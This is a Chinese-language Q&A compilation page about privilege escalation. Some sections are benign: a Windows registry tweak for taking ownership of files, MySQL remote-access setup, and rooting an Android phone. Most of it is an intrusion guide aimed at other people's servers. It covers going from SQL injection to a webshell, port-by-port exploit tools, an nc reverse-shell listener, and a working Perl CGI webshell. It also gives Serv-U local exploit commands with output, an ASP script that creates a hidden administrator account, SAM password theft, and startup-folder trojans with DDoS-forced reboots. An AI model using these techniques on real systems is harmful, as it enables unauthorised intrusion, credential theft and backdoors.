本文目錄一覽:
- 1、怎樣注入PHP網站提權3389權限
- 2、WINDOWS 7 怎樣完全提權???
- 3、php提權能控制整個主機嗎,如同從本機登陸遠程3389主機
- 4、如何找漏洞,又怎樣利用它提權
- 5、如何用手機提權u880,2.2.2的,謝謝
怎樣注入PHP網站提權3389權限
查找可用的注入點,注入後得到管理員帳號密碼進後台傳小馬後再大馬提權OK
WINDOWS 7 怎樣完全提權???
新建一個文本文檔 複製以下內容到新建的文檔中
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@=”獲取管理員權限”
“NoWorkingDirectory”=””
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”
“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@=”獲取管理員權限”
“NoWorkingDirectory”=””
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”
“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” icacls \”%1\” /grant administrators:F”
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@=”獲取管理員權限”
“NoWorkingDirectory”=””
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@=”cmd.exe /c takeown /f \”%1\” /r /d y icacls \”%1\” /grant administrators:F /t”
“IsolatedCommand”=”cmd.exe /c takeown /f \”%1\” /r /d y icacls \”%1\” /grant administrators:F /t”
現在關閉此文檔 並且文件名保存為 提權.reg
現在打開剛才做好的文件 點擊確定導入註冊表
在需要提權的文件上點擊右鍵 會有一個獲取管理員權限選項 點擊一個黑框閃過
你就提權了。。。。如果是一個目錄黑框會多顯示一會 待它自動關閉即可
php提權能控制整個主機嗎,如同從本機登陸遠程3389主機
2/4分步閱讀
遠程連接服務器之前首先需要把基本的準備工作做好,比如首先在服務器創建一個新的網站,並把相應的網站內容上傳好。
我這裡以wdcp linux服務器為例子,如下圖所示創建一個新的網站

2/3
通過flashfxp等軟件將網站上傳至服務器

3/3
進入phpmyadmin,導入sql文件

連接遠程數據庫
1/4
選擇該數據庫,然後點擊權限,可以看到如下圖所示,然後點擊下方添加新用戶

2/4
然後輸入新用戶信息:
1、輸入用戶名
2、主機:選擇任意主機,然後輸入 %
(開啟mysql本身的遠程連接,簡單說,就是在創建mysql用戶時的主機名,使用IP,域名,或%號就可以,”%”代表所有,也就是任何人和機器都可以連接,只要有用戶密碼,也可以針對IP,域名來做限制)
3、生成密碼
4、全局權限:全選
5、最後執行

3/4
通過以上步驟就生成了一個可以遠程訪問的數據庫,然後通過更改網站配置文件,php文件配置路徑如下圖,選擇database.php,然後打開文件
如何找漏洞,又怎樣利用它提權
1. 1433端口入侵
scanport.exe 查有1433的機器
SQLScanPass.exe 進行字典暴破(字典是關鍵)
最後 SQLTools.exe入侵
對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
2. 4899端口入侵
用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵
對很早的機器,可以試試3389的溢出(win3389ex.exe)
對2000的機器,可以試試字典暴破。(tscrack.exe)
4. 80入侵
對sp3以前的機器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行注入。(啊D的注入軟件)。
5. serv-u入侵(21端口)
對5. 004及以下系統,可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出入侵。
9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
經典IPC$入侵
本篇文章結合了許多高手提升權限的技巧和自己的一些想法
當我們取得一個webshell時候,下一部要做的就是提升權限
個人總結如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸
2.C:\WINNT\system32\config\
進這裡下它的SAM,破解用戶的密碼
用到破解sam密碼的軟件有LC,SAMinside
3.C:\Documents and Settings\All Users\「開始」菜單\程序\
看這裡能跳轉不,我們從這裡可以獲取好多有用的信息
可以看見好多快捷方式,我們一般選擇Serv-U的,然後本地查看屬性,知道路徑後,看能否跳轉
進去後,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個用戶具有最高權限,然後我們就可以ftp上去 quote site exec xxx 來提升權限
4.c:\winnt\system32\inetsrv\data\
就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然後執行
5.看能否跳轉到如下目錄
c:\php, 用phpspy
c:\prel,有時候不一定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, “HTMLPRE\r\n”, 13);
open(STDERR, “STDOUT”) || die “Can’t redirect STDERR”;
system($execthis);
syswrite(STDOUT, “\r\n/PRE/HTML\r\n”, 17);
close(STDERR);
close(STDOUT);
exit;
保存為cgi執行,
如果不行,可以試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交
顯示”拒絕訪問”,表示可以執行了!馬上提交:先的上傳個su.exe(ser-u提升權限的工具)到 prel的bin目錄
\perl\bin\su.exe
返回:
Serv-u 3.x Local Exploit by xiaolu
USAGE: serv-u.exe “command”
Example: serv-u.exe “nc.exe -l -p 99 -e cmd.exe”
現在是 IUSR 權限,提交:
\perl\bin\su.exe “cacls.exe c: /E /T /G everyone:F”
\perl\bin\su.exe “cacls.exe d: /E /T /G everyone:F”
\perl\bin\su.exe “cacls.exe e: /E /T /G everyone:F”
\perl\bin\su.exe “cacls.exe f: /E /T /G everyone:F”
如果返回下面的信息,就表示成功了
Serv-u 3.x Local Exploit by xiaolu
220 Serv-U FTP Server v5.2 for WinSock ready…
USER LocalAdministrator
331 User name okay, need password.
******************************************************
PASS #l@$ak#.lk;0@P
230 User logged in, proceed.
******************************************************
SITE MAINTENANCE
******************************************************
[+] Creating New Domain…
200-DomainID=2
220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting…
USER xl
331 User name okay, need password.
******************************************************
PASS 111111
230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
220 Domain deleted
這樣所有分區為everyone完全控制
現在我們把自己的用戶提升為管理員:
\perl\bin\su.exe ” net localgroup administrators IUSR_anyhost /add”
6.可以成功運行”cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps”來提升權限
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps “C:\WINNT\system32\idq.dll” “C:\WINNT\system32\inetsrv\httpext.dll” “C:\WINNT\system32\inetsrv\httpodbc.dll” “C:\WINNT\system32\inetsrv\ssinc.dll” “C:\WINNT\system32\msw3prt.dll””c:\winnt\system32\inetsrv\asp.dll”
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了
7.還可以用這段代碼試提升,好象效果不明顯
%@codepage=936%%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject(“WSCRIPT.NETWORK”)
oz=”WinNT://”lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz”/Administrators,group”)
Set od=ob.Create(“user”,”WekweN$”)
od.SetPassword “WekweN” —–密碼
od.SetInfo
Set of=GetObject(oz”/WekweN$,user”)
oe.Add(of.ADsPath)
Response.write “WekweN$ 超級帳號建立成功!”%
用這段代碼檢查是否提升成功
%@codepage=936%
%Response.Expires=0
on error resume next ‘查找Administrators組帳號
Set tN=server.CreateObject(“Wscript.Network”)
Set objGroup=GetObject(“WinNT://”tN.ComputerName”/Administrators,group”)
For Each admin in objGroup.Members
Response.write admin.Name”br”
Next
if err then
Response.write “不行啊:Wscript.Network”
end if
%
8.C:\Program Files\Java Web Start\
這裡如果可以,一般很小,可以嘗試用jsp的webshell,聽說權限很小,本人沒有遇見過。
9.最後了,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動”寫入bat,vbs等木馬。
等到主機重啟或者你ddos逼它重啟,來達到權限提升的目的。
總結起來說就是,找到有執行和寫入的目錄,管他什麼目錄,然後上傳提升工具,最後執行,三個字”找” “上””執”
以上是本人的拙見,大家有什麼好的方法多多分享
如何用手機提權u880,2.2.2的,謝謝
工具自己找下吧
U880提權及刷入recovery的方法和步驟
方法一:使用子規製作的一鍵root、刷入recovery包提權、刷入recovery。
步驟1:安裝相應ROM版本的joinme軟件(沒有刷B10版本底包的同學可直接用官方標配的光盤安裝,已經硬刷至B10版本的同學請卸載舊版Joinme後,將手機連接電腦後點擊我的電腦—點擊名為JOINME的盤符——安裝JOINME);安裝結束後右鍵我的電腦---進入設備管理器, 發現有ADB interface項之後便可進行ROOT操作了,如果未發現請重啟計算機再試。 2011-8-2 21:50:13 上傳下載附件 (9.29 KB)
步驟2:下載子規製作的一鍵root、添加recovery包並解壓至電腦任意盤符下(不可放入手機SD卡上運行),在此過程中殺毒軟件會報發現病毒,將ROOT程序設為信任就可以了,實在不行請先關閉殺毒軟件。
步驟3:運行「一鍵ROOT-u880-v2.1.exe」文件,然後按照指示完成操作就可以完成提權(在重啟機器之後,在程序列表裡出現一個叫授權管理的小骷髏頭,那說明你成功ROOT了) 或刷入recovery了。
2011-8-2 21:53:55 上傳下載附件 (83.34 KB)
方法二:
步驟1:同以上方法的步驟一。
步驟2:下載並打開superoneclick,在Universal界面下點擊root鍵就可以了,在重啟機器之後,在程序列表裡出現一個叫授權管理的小骷髏頭,那說明你成功ROOT了。
2011-8-2 22:17:32 上傳下載附件 (39.82 KB)
數據銀行網盤附件:
【DBank網盤】SuperOneClick v1.9.1.rar(1.37M)
數據銀行網盤附件:
【DBank網盤】
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/297217.html